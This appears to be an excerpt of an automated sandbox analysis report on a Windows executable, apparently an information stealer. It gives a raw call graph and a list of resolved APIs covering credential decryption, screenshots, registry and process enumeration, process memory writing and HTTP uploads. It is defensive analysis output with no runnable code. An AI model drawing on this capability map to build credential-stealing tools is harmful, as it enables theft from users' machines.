13660->13661 13662 410340 3 API calls 13661->13662 13663 413c7a 13662->13663 13664 410290 lstrcpyA 13663->13664 13665 413c82 13664->13665 13666 410340 3 API calls 13665->13666 13667 413c96 13666->13667 13668 410290 lstrcpyA 13667->13668 13669 413c9e 13668->13669 13959 410fe0 13669->13959 13671 413cab 13672 4102e0 2 API calls 13671->13672 13673 413cb4 13672->13673 13674 410290 lstrcpyA 13673->13674 13675 413cbc 13674->13675 13676 410340 3 API calls 13675->13676 13677 413cd7 13676->13677 13678 410290 lstrcpyA 13677->13678 13679 413cdf 13678->13679 13680 410340 3 API calls 13679->13680 13681 413cf3 13680->13681 13682 410290 lstrcpyA 13681->13682 13683 413cfb 13682->13683 13968 410d80 13683->13968 13686 4102e0 2 API calls 13687 413d16 13686->13687 13688 410290 lstrcpyA 13687->13688 13689 413d1e 13688->13689 13690 410d80 16 API calls 13689->13690 13691 413d37 13690->13691 13692 4102e0 2 API calls 13691->13692 13693 413d40 13692->13693 13694 410290 lstrcpyA 13693->13694 13695 413d48 13694->13695 13696 410340 3 API calls 13695->13696 13697 413d63 13696->13697 13698 410290 lstrcpyA 13697->13698 13699 413d6b 13698->13699 13700 413d8a lstrlenA 13699->13700 13701 413d97 13700->13701 13702 4101c0 lstrcpyA 13701->13702 13703 413da7 13702->13703 13704 410200 lstrcpyA 13703->13704 13705 413db3 13704->13705 13706 410200 lstrcpyA 13705->13706 13707 413dbf 13706->13707 13708 410200 lstrcpyA 13707->13708 13709 413dcb 13708->13709 13710 410200 lstrcpyA 13709->13710 13711 413de1 13710->13711 13984 413e50 13711->13984 13713 413e0f 13713->12602 13715 40e806 13714->13715 13753 40e456 13714->13753 13716 410200 lstrcpyA 13715->13716 13717 40e81a 13716->13717 13719 410200 lstrcpyA 13717->13719 13718 40e4ad StrCmpCA 13718->13753 13720 40e829 13719->13720 13721 410200 lstrcpyA 13720->13721 13723 40e838 13721->13723 13722 40e5b3 StrCmpCA 13722->13753 13724 410200 lstrcpyA 13723->13724 13726 40e84e 13724->13726 13725 4101c0 lstrcpyA 13725->13753 14791 40d9c0 memset memset memset memset 
RegOpenKeyExA 13726->14791 13727 40e73a StrCmpCA 13727->13753 13729 410340 lstrlenA lstrcpyA lstrcatA 13729->13753 13730 40e86b 13731 410200 lstrcpyA 13730->13731 13733 40e87c 13731->13733 13732 4102e0 2 API calls 13732->13753 13734 410200 lstrcpyA 13733->13734 13735 40e887 13734->13735 13736 410200 lstrcpyA 13735->13736 13738 40e892 13736->13738 13737 410290 lstrcpyA 13737->13753 13739 410200 lstrcpyA 13738->13739 13740 40e8a8 13739->13740 14826 40de80 13740->14826 13741 410200 lstrcpyA 13741->13753 13745 40e91d StrCmpCA 13759 40e8c5 13745->13759 13746 40ea23 StrCmpCA 13746->13759 13747 40ec76 13748 4101c0 lstrcpyA 13748->13759 13749 40ebaa StrCmpCA 13749->13759 13750 4102e0 2 API calls 13750->13759 13751 410340 lstrlenA lstrcpyA lstrcatA 13751->13759 13752 410290 lstrcpyA 13752->13759 13753->13715 13753->13718 13753->13722 13753->13725 13753->13727 13753->13729 13753->13732 13753->13737 13753->13741 14496 40b0f0 13753->14496 14572 40b4e0 13753->14572 14729 40cdf0 13753->14729 13754 40b0f0 443 API calls 13754->13759 13756 40cdf0 61 API calls 13756->13759 13757 410200 lstrcpyA 13757->13759 13758 40b4e0 444 API calls 13758->13759 13759->13745 13759->13746 13759->13747 13759->13748 13759->13749 13759->13750 13759->13751 13759->13752 13759->13754 13759->13756 13759->13757 13759->13758 13761 410409 13760->13761 13762 4103b2 13760->13762 13763 4103d7 lstrcpyA 13762->13763 13764 4103c9 13762->13764 13763->13764 13764->12849 13766 410200 lstrcpyA 13765->13766 13767 416930 13766->13767 13768 410200 lstrcpyA 13767->13768 13769 416939 13768->13769 13808 404280 13769->13808 13771 416943 13772 4101c0 lstrcpyA 13771->13772 13773 416954 13772->13773 13834 410500 StrCmpCA 13773->13834 13775 41695c 13775->12886 13777 4169dd 13776->13777 13778 4101c0 lstrcpyA 13777->13778 13779 4169f1 13778->13779 13780 410200 lstrcpyA 13779->13780 13781 4169fa 13780->13781 13782 404280 21 API calls 13781->13782 13783 416a04 13782->13783 13784 410290 lstrcpyA 13783->13784 13785 416a11 13784->13785 
13786 416a25 StrCmpCA 13785->13786 13787 416a35 13786->13787 13788 416abb 13786->13788 13790 416a45 lstrlenA 13787->13790 13789 4101c0 lstrcpyA 13788->13789 13803 416ab9 13789->13803 13791 416a51 13790->13791 13843 4115b0 13791->13843 13793 416a58 13793->13788 13794 416a5c 13793->13794 13795 416a6c StrStrA 13794->13795 13796 416a7e 13795->13796 13795->13803 13798 416a8e lstrlenA 13796->13798 13797 4101c0 lstrcpyA 13797->13803 13847 411490 13798->13847 13801 416ab0 13805 4101c0 lstrcpyA 13801->13805 13802 416b28 13804 4101c0 lstrcpyA 13802->13804 13803->13797 13804->13803 13805->13803 13806->12868 13807->12886 13809 410200 lstrcpyA 13808->13809 13810 4042a9 13809->13810 13835 402790 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI 13810->13835 13812 4042b3 13813 4101c0 lstrcpyA 13812->13813 13814 4042c2 13813->13814 13815 4042cf InternetOpenA StrCmpCA 13814->13815 13816 404302 InternetConnectA 13815->13816 13817 404444 13815->13817 13816->13817 13818 40433b HttpOpenRequestA 13816->13818 13821 4101c0 lstrcpyA 13817->13821 13819 404371 13818->13819 13820 40446b InternetCloseHandle 13818->13820 13822 404377 InternetSetOptionA 13819->13822 13823 40438d HttpSendRequestA HttpQueryInfoA 13819->13823 13820->13817 13829 404451 13821->13829 13822->13823 13824 4043c1 13823->13824 13825 40445c 13823->13825 13824->13825 13833 4043d2 13824->13833 13826 4101c0 lstrcpyA 13825->13826 13826->13829 13827 404477 InternetCloseHandle 13828 410200 lstrcpyA 13827->13828 13828->13829 13829->13771 13830 4043f0 InternetReadFile 13830->13827 13830->13833 13831 410340 3 API calls 13831->13833 13832 410290 lstrcpyA 13832->13833 13833->13827 13833->13830 13833->13831 13833->13832 13834->13775 13841 410530 13835->13841 13837 4028e9 lstrlenA 13842 410530 13837->13842 13839 4028f5 InternetCrackUrlA 13840 402903 13839->13840 13840->13812 13841->13837 13842->13839 13844 4115c2 13843->13844 13846 4115e2 13843->13846 13845 4115ce LocalAlloc 13844->13845 13844->13846 13845->13846 13846->13793 13846->13846 13848 
41149b lstrlenA 13847->13848 13848->13801 13848->13802 13850 410720 13849->13850 13851 41079e 13849->13851 13852 4101c0 lstrcpyA 13850->13852 13853 4101c0 lstrcpyA 13851->13853 13854 410730 memset 13852->13854 13855 4107aa 13853->13855 13856 410754 13854->13856 13855->12915 13857 411e60 3 API calls 13856->13857 13858 410761 13857->13858 13859 410768 lstrcatA 13858->13859 13868 410230 13859->13868 13861 41077a lstrcatA 13862 41078d 13861->13862 13863 4101c0 lstrcpyA 13862->13863 13864 410795 13863->13864 13864->13855 13866 4101c0 lstrcpyA 13865->13866 13867 411e96 13866->13867 13867->12919 13869 410237 13868->13869 13869->13861 13870->13066 13871->13247 13872->13253 13874 4077b8 LocalAlloc 13873->13874 13876 40402f 13874->13876 13876->13110 13876->13112 13877->13272 13879 4101c0 lstrcpyA 13878->13879 13880 411597 13879->13880 13880->13292 13881->13313 13882->13362 13883->13392 13885 4111d5 RegCloseKey CharToOemA 13884->13885 13886 4111b8 RegQueryValueExA 13884->13886 13885->13406 13886->13885 13888 411d01 13887->13888 13889 411ce7 K32GetModuleFileNameExA CloseHandle 13887->13889 13890 4101c0 lstrcpyA 13888->13890 13889->13888 13891 411d0b 13890->13891 13891->13450 13893 410824 RegQueryValueExA 13892->13893 13894 41083d RegCloseKey 13892->13894 13893->13894 13895 41084c 13894->13895 13896 41089b 13895->13896 13897 41085b RegOpenKeyExA 13895->13897 13896->13472 13898 410890 RegCloseKey 13897->13898 13899 410877 RegQueryValueExA 13897->13899 13898->13896 13899->13898 13901 4101c0 lstrcpyA 13900->13901 13902 411211 13901->13902 13902->13486 13903->13513 13904->13527 13906 4101c0 lstrcpyA 13905->13906 13907 41110b 13906->13907 13907->13542 13909 4101c0 lstrcpyA 13908->13909 13910 410a0d GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 13909->13910 13911 410a3b GetLocaleInfoA 13910->13911 13925 410b0f 13910->13925 13912 410340 3 API calls 13911->13912 13915 410a64 13912->13915 13913 410b17 LocalFree 13914 410b1e 13913->13914 13914->13556 13916 410290 lstrcpyA 
13915->13916 13917 410a6c 13916->13917 14000 411270 13917->14000 13919 410aa0 GetLocaleInfoA 13920 410340 3 API calls 13919->13920 13921 410a84 13920->13921 13921->13913 13921->13919 13922 410340 3 API calls 13921->13922 13923 410290 lstrcpyA 13921->13923 13924 411270 memset 13921->13924 13921->13925 13922->13921 13923->13921 13924->13921 13925->13913 13925->13914 13926->13569 13928 4109e5 13927->13928 13929 4109bd wsprintfA 13927->13929 13928->13584 13929->13928 13931 410b72 RegQueryValueExA 13930->13931 13932 410b8b RegCloseKey 13930->13932 13931->13932 13932->13601 13934 410c12 GetLogicalProcessorInformationEx 13933->13934 13935 410c36 13934->13935 13936 410c1f GetLastError 13934->13936 13937 410c97 13935->13937 13938 410c3d 13935->13938 13939 410c86 13936->13939 13940 410c2a 13936->13940 13941 4112b0 2 API calls 13937->13941 13946 4112b0 2 API calls 13938->13946 13945 4112b0 2 API calls 13939->13945 13947 410c95 13939->13947 13942 410c00 13940->13942 13941->13947 13942->13934 13942->13947 14003 4112e0 GetProcessHeap HeapAlloc 13942->14003 14004 4112b0 13942->14004 13945->13947 13948 410c6c 13946->13948 13947->13616 13948->13947 13949 410c70 wsprintfA 13948->13949 13949->13947 13950->13629 13952 411270 memset 13951->13952 13953 410cdf GlobalMemoryStatusEx wsprintfA 13952->13953 13953->13643 13955 4101c0 lstrcpyA 13954->13955 13956 410d4a 13955->13956 13957 410d70 13956->13957 13958 410240 2 API calls 13956->13958 13957->13658 13958->13957 13960 4101c0 lstrcpyA 13959->13960 13961 410ffd CreateToolhelp32Snapshot Process32First 13960->13961 13962 411021 Process32Next 13961->13962 13963 411084 CloseHandle 13961->13963 13962->13963 13966 411031 13962->13966 13963->13671 13964 410290 lstrcpyA 13964->13966 13965 410340 lstrlenA lstrcpyA lstrcatA 13965->13966 13966->13964 13966->13965 13967 411074 Process32Next 13966->13967 13967->13963 13967->13966 13969 4101c0 lstrcpyA 13968->13969 13970 410da4 RegOpenKeyExA 13969->13970 13971 410fcc 13970->13971 13972 410ddc 
RegEnumKeyExA 13970->13972 13971->13686 13973 410fbb RegCloseKey 13972->13973 13974 410e1e 13972->13974 13973->13971 13975 410e74 wsprintfA RegOpenKeyExA 13974->13975 13976 410fb1 RegCloseKey 13975->13976 13977 410eae RegQueryValueExA 13975->13977 13976->13973 13978 410e30 RegCloseKey RegEnumKeyExA 13977->13978 13979 410edb lstrlenA 13977->13979 13978->13973 13978->13975 13979->13978 13983 410eeb 13979->13983 13980 410f39 RegQueryValueExA 13980->13978 13980->13983 13981 410340 lstrlenA lstrcpyA lstrcatA 13981->13983 13982 410290 lstrcpyA 13982->13983 13983->13978 13983->13980 13983->13981 13983->13982 13985 413e69 13984->13985 13986 410290 lstrcpyA 13985->13986 13987 413eac 13986->13987 13988 410290 lstrcpyA 13987->13988 13989 413ee1 13988->13989 13990 410290 lstrcpyA 13989->13990 13991 413eef 13990->13991 13992 410290 lstrcpyA 13991->13992 13993 413efb 13992->13993 13994 413f0a Sleep 13993->13994 13997 413f17 13993->13997 13994->13993 13995 413f5a CreateThread WaitForSingleObject 13996 4101c0 lstrcpyA 13995->13996 14269 416ea0 13995->14269 13999 413f8b 13996->13999 13997->13995 14007 41e4c0 13997->14007 13999->13713 14001 411289 14000->14001 14002 411278 memset 14000->14002 14001->13921 14002->14001 14003->13942 14005 4112ba GetProcessHeap HeapFree 14004->14005 14006 4112cc 14004->14006 14005->14006 14006->13942 14008 41e4f0 14007->14008 14009 41e4c8 14007->14009 14008->13995 14010 41e4e8 14009->14010 14012 41dd60 14009->14012 14010->13995 14013 41dd75 14012->14013 14066 41dd82 14012->14066 14014 41dd91 lstrcpyA 14013->14014 14013->14066 14015 41ddd0 14014->14015 14014->14066 14016 41de32 strlen 14015->14016 14017 41de09 14015->14017 14019 41de17 14016->14019 14069 41d0c0 lstrlenA 14017->14069 14020 41def3 14019->14020 14021 41de6c 14019->14021 14024 41d590 14 API calls 14020->14024 14022 41de75 14021->14022 14023 41df04 14021->14023 14025 41df1f 14022->14025 14026 41de7e 14022->14026 14089 41d710 14023->14089 14032 41df02 14024->14032 14025->14066 14093 41d850 
GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14025->14093 14028 41dea8 CreateFileA 14026->14028 14026->14066 14030 41ded5 14028->14030 14028->14066 14080 41d590 14030->14080 14031 41df42 lstrcpyA lstrcpyA lstrlenA 14034 41df8c lstrcpyA 14031->14034 14035 41df7c lstrcatA 14031->14035 14032->14031 14032->14066 14095 41e500 14034->14095 14035->14034 14037 41dee5 CloseHandle 14037->14066 14066->14010 14071 41d0d5 14069->14071 14070 41d0f7 StrCmpCA 14072 41d17c 14070->14072 14073 41d109 StrCmpCA 14070->14073 14071->14070 14071->14072 14072->14019 14073->14072 14074 41d119 StrCmpCA 14073->14074 14074->14072 14075 41d129 StrCmpCA 14074->14075 14075->14072 14076 41d139 StrCmpCA 14075->14076 14076->14072 14077 41d149 StrCmpCA 14076->14077 14077->14072 14078 41d159 StrCmpCA 14077->14078 14078->14072 14079 41d169 StrCmpCA 14078->14079 14079->14072 14081 41d5d8 SetFilePointer 14080->14081 14082 41d5cc 14080->14082 14083 41d622 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14081->14083 14084 41d5ee 14081->14084 14082->14032 14082->14037 14086 41d6dd __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14083->14086 14230 41d190 GetFileInformationByHandle 14084->14230 14088 41d60a SetFilePointer 14088->14082 14090 41d769 14089->14090 14091 41d813 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14089->14091 14090->14091 14092 41d771 GetLocalTime SystemTimeToFileTime FileTimeToSystemTime 14090->14092 14091->14032 14092->14091 14094 41d919 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14093->14094 14094->14032 14096 41d3f0 5 API calls 14095->14096 14097 41e521 14096->14097 14098 41d3f0 5 API calls 14097->14098 14099 41e530 14098->14099 14100 41d3f0 5 API calls 14099->14100 14101 41e543 14100->14101 14102 41d3f0 5 API calls 14101->14102 14103 41e552 14102->14103 14104 41d3f0 5 API calls 14103->14104 14105 41e568 14104->14105 14106 41d3f0 5 API calls 14105->14106 14107 41e57a 14106->14107 14108 41d3f0 5 API calls 14107->14108 14109 41e590 14108->14109 14110 41d3f0 5 API calls 
14109->14110 14111 41e5a2 14110->14111 14112 41d3f0 5 API calls 14111->14112 14113 41e5b8 14112->14113 14114 41d3f0 5 API calls 14113->14114 14115 41e5ca 14114->14115 14116 41d3f0 5 API calls 14115->14116 14117 41e5e0 14116->14117 14118 41d3f0 5 API calls 14117->14118 14119 41e5f2 14118->14119 14120 41d3f0 5 API calls 14119->14120 14121 41e608 14120->14121 14122 41d3f0 5 API calls 14121->14122 14123 41e61a 14122->14123 14124 41d3f0 5 API calls 14123->14124 14125 41e630 14124->14125 14126 41d3f0 5 API calls 14125->14126 14127 41e642 14126->14127 14128 41d3f0 5 API calls 14127->14128 14129 41e658 14128->14129 14130 41d3f0 5 API calls 14129->14130 14131 41e66a 14130->14131 14132 41d3f0 5 API calls 14131->14132 14133 41e680 14132->14133 14134 41d3f0 5 API calls 14133->14134 14135 41e692 14134->14135 14136 41d3f0 5 API calls 14135->14136 14137 41e6a8 14136->14137 14138 41d3f0 5 API calls 14137->14138 14139 41e6ba 14138->14139 14140 41d3f0 5 API calls 14139->14140 14141 41e6d0 14140->14141 14142 41d3f0 5 API calls 14141->14142 14143 41e6e2 14142->14143 14231 41d29a 14230->14231 14232 41d1af GetFileSize 14230->14232 14231->14082 14231->14088 14233 41d1f6 SetFilePointer ReadFile SetFilePointer ReadFile 14232->14233 14237 41d281 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14232->14237 14234 41d243 14233->14234 14233->14237 14235 41d24e SetFilePointer ReadFile 14234->14235 14234->14237 14235->14237 14236 41d330 FileTimeToSystemTime 14236->14231 14237->14231 14237->14236 14280 410530 14269->14280 14271 416ebf lstrlenA 14272 416f9e 14271->14272 14276 416eca 14271->14276 14273 410200 lstrcpyA 14273->14276 14275 410290 lstrcpyA 14275->14276 14276->14273 14276->14275 14277 416f71 StrCmpCA 14276->14277 14281 403090 14276->14281 14277->14276 14278 416f81 14277->14278 14279 411270 memset 14278->14279 14279->14272 14280->14271 14282 4101c0 lstrcpyA 14281->14282 14283 4030b2 14282->14283 14284 410200 lstrcpyA 14283->14284 14285 4030c2 14284->14285 14286 402790 5 API calls 14285->14286 

Control-flow Graph

APIs
• LoadLibraryA.KERNEL32(gdiplus.dll,00417538), ref: 00418D07
• LoadLibraryA.KERNEL32(ole32.dll), ref: 00418D17
• LoadLibraryA.KERNEL32(bcrypt.dll), ref: 00418D27
• LoadLibraryA.KERNEL32(wininet.dll), ref: 00418D37
• LoadLibraryA.KERNEL32(shlwapi.dll), ref: 00418D47
• LoadLibraryA.KERNEL32(shell32.dll), ref: 00418D57
• LoadLibraryA.KERNEL32(psapi.dll), ref: 00418D67
• LoadLibraryA.KERNEL32(rstrtmgr.dll), ref: 00418D77
• LoadLibraryA.KERNEL32(dbghelp.dll), ref: 00418D87
• GetProcAddress.KERNEL32(751E0000,CreateCompatibleBitmap), ref: 00418DA1
• GetProcAddress.KERNEL32(SelectObject), ref: 00418DB7
• GetProcAddress.KERNEL32(BitBlt), ref: 00418DCD
• GetProcAddress.KERNEL32(DeleteObject), ref: 00418DE3
• GetProcAddress.KERNEL32(CreateCompatibleDC), ref: 00418DF9
• GetProcAddress.KERNEL32(73900000,GdipGetImageEncodersSize), ref: 00418E17
• GetProcAddress.KERNEL32(GdipGetImageEncoders), ref: 00418E2D
• GetProcAddress.KERNEL32(GdipCreateBitmapFromHBITMAP), ref: 00418E43
• GetProcAddress.KERNEL32(GdiplusStartup), ref: 00418E59
• GetProcAddress.KERNEL32(GdiplusShutdown), ref: 00418E6F
• GetProcAddress.KERNEL32(GdipSaveImageToStream), ref: 00418E85
• GetProcAddress.KERNEL32(GdipDisposeImage), ref: 00418E9B
• GetProcAddress.KERNEL32(GdipFree), ref: 00418EB1
• GetProcAddress.KERNEL32(753A0000,GetHGlobalFromStream), ref: 00418ECB
• GetProcAddress.KERNEL32(CreateStreamOnHGlobal), ref: 00418EE1
• GetProcAddress.KERNEL32(CoUninitialize), ref: 00418EF7
• GetProcAddress.KERNEL32(CoInitialize), ref: 00418F0D
• GetProcAddress.KERNEL32(CoCreateInstance), ref: 00418F23
• GetProcAddress.KERNEL32(76310000,BCryptGenerateSymmetricKey), ref: 00418F3D
• GetProcAddress.KERNEL32(BCryptCloseAlgorithmProvider), ref: 00418F53
• GetProcAddress.KERNEL32(BCryptDecrypt), ref: 00418F69
• GetProcAddress.KERNEL32(BCryptSetProperty), ref: 00418F7F
• GetProcAddress.KERNEL32(BCryptDestroyKey), ref: 00418F95
• GetProcAddress.KERNEL32(BCryptOpenAlgorithmProvider), ref: 00418FAB
• GetProcAddress.KERNEL32(76910000,GetWindowRect), ref: 00418FC9
• GetProcAddress.KERNEL32(GetDesktopWindow), ref: 00418FDF
• GetProcAddress.KERNEL32(GetDC), ref: 00418FF5
• GetProcAddress.KERNEL32(CloseWindow), ref: 0041900B
• GetProcAddress.KERNEL32(wsprintfA), ref: 00419021
• GetProcAddress.KERNEL32(EnumDisplayDevicesA), ref: 00419037
• GetProcAddress.KERNEL32(GetKeyboardLayoutList), ref: 0041904D
• GetProcAddress.KERNEL32(CharToOemW), ref: 00419063
• GetProcAddress.KERNEL32(wsprintfW), ref: 00419079
• GetProcAddress.KERNEL32(75B30000,RegQueryValueExA), ref: 00419093
• GetProcAddress.KERNEL32(RegEnumKeyExA), ref: 004190A9
• GetProcAddress.KERNEL32(RegOpenKeyExA), ref: 004190BF
• GetProcAddress.KERNEL32(RegCloseKey), ref: 004190D5
• GetProcAddress.KERNEL32(RegEnumValueA), ref: 004190EB
• GetProcAddress.KERNEL32(75670000,CryptBinaryToStringA), ref: 00419105
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(CryptUnprotectData), ref: 0041911B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76AC0000,SHGetFolderPathA), ref: 00419135
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(ShellExecuteExA), ref: 0041914B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6F4E0000,InternetOpenUrlA), ref: 00419169
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetConnectA), ref: 0041917F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetCloseHandle), ref: 00419195
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetOpenA), ref: 004191AB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpSendRequestA), ref: 004191C1
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpOpenRequestA), ref: 004191D7
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetReadFile), ref: 004191ED
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetCrackUrlA), ref: 00419203
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(HttpQueryInfoA), ref: 00419219
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(InternetSetOptionA), ref: 0041922F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(75AE0000,StrCmpCA), ref: 00419249
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(StrStrA), ref: 0041925F
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(StrCmpCW), ref: 00419275
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(PathMatchSpecA), ref: 0041928B
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(76300000,GetModuleFileNameExA), ref: 004192A5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6D380000,RmStartSession), ref: 004192BF
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmRegisterResources), ref: 004192D5
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmGetList), ref: 004192EB
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(RmEndSession), ref: 00419301
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(6D190000,SymMatchString), ref: 0041931B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2787464381.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_ktyihkdfesf.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                  • String ID: BCryptCloseAlgorithmProvider$BCryptDecrypt$BCryptDestroyKey$BCryptGenerateSymmetricKey$BCryptOpenAlgorithmProvider$BCryptSetProperty$BitBlt$CharToOemW$CloseWindow$CoCreateInstance$CoInitialize$CoUninitialize$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateFileA$CreateProcessA$CreateStreamOnHGlobal$CreateToolhelp32Snapshot$CryptBinaryToStringA$CryptUnprotectData$DeleteFileA$DeleteObject$EnumDisplayDevicesA$FindClose$FindFirstFileA$FindNextFileA$FreeLibrary$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipFree$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$GdiplusShutdown$GdiplusStartup$GetCurrentProcessId$GetDC$GetDesktopWindow$GetEnvironmentVariableA$GetFileAttributesA$GetFileSize$GetFileSizeEx$GetHGlobalFromStream$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalProcessorInformationEx$GetModuleFileNameA$GetModuleFileNameExA$GetSystemPowerStatus$GetThreadContext$GetTimeZoneInformation$GetUserDefaultLocaleName$GetVolumeInformationA$GetWindowRect$GetWindowsDirectoryA$GlobalAlloc$GlobalFree$GlobalLock$GlobalSize$HeapFree$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetCrackUrlA$InternetOpenA$InternetOpenUrlA$InternetReadFile$InternetSetOptionA$IsWow64Process$LocalAlloc$LocalFree$MultiByteToWideChar$OpenProcess$PathMatchSpecA$Process32First$Process32Next$ReadProcessMemory$RegCloseKey$RegEnumKeyExA$RegEnumValueA$RegOpenKeyExA$RegQueryValueExA$ResumeThread$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$SHGetFolderPathA$SelectObject$SetEnvironmentVariableA$SetFilePointer$SetThreadContext$ShellExecuteExA$StrCmpCA$StrCmpCW$StrStrA$SymMatchString$TerminateProcess$VirtualAllocEx$VirtualProtect$WideCharToMultiByte$WriteFile$WriteProcessMemory$bcrypt.dll$dbghelp.dll$gdiplus.dll$lstrcpynA$ole32.dll$psapi.dll$rstrtmgr.dll$shell32.dll$shlwapi.dll$wininet.dll$wsprintfA$wsprintfW
                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-859426583
                                                                                                                                                                                                                                                                                                  • Opcode ID: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0a0f86706a4d50df5c0891041486815c3a2fdb24875638c890ef6a63e7135bce
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e334bc535a13e97accdcf64ac2a3aa2131f507ae42f1c63ed7f53eac5600871f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0032D6B0A41B50AFD7116F61FD06B257AA3FB85705354603BB802972B2DBBA1850EFD8
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00402400: memcpy.MSVCRT(00000000,?,?,?,-00000001,77355E70,00000000,0040D14C,?,00000000), ref: 004024B6
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                                  • memcmp.MSVCRT(00000000,ws://,00000005,?,00000000,00000005), ref: 00405594
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000005), ref: 004055FD
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 00405644
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000005,-00000005), ref: 0040570A
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00000005,000000FF,?,00000000,00000005), ref: 004057D4
                                                                                                                                                                                                                                                                                                  • memchr.MSVCRT ref: 00405814
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000001,000000FF), ref: 004058DA
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000,00000000,?,00000001,000000FF), ref: 0040595E
                                                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00405993
                                                                                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004059AE
                                                                                                                                                                                                                                                                                                  • getaddrinfo.WS2_32(00000000,00000000,?,00000000), ref: 00405A18
                                                                                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00405A2A
                                                                                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00405A30
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AA0
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 00405AF3
                                                                                                                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,0042150A,00000000,?,00000000,00000005), ref: 00405B46
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040ED20: memmove.MSVCRT(?,00000000,?,00000000,-00000001,77355E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDA3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406940: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,0040D83E,00000000,?,00000000), ref: 00406982
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00406940: memmove.MSVCRT(?,?,?,00000000,?,0040D83E,00000000,?,00000000), ref: 004069AA
                                                                                                                                                                                                                                                                                                  • htons.WS2_32(00000000), ref: 00405B76
                                                                                                                                                                                                                                                                                                  • freeaddrinfo.WS2_32(00000000), ref: 00405B96
                                                                                                                                                                                                                                                                                                  • connect.WS2_32(?,00000002,00000010), ref: 00405BAB
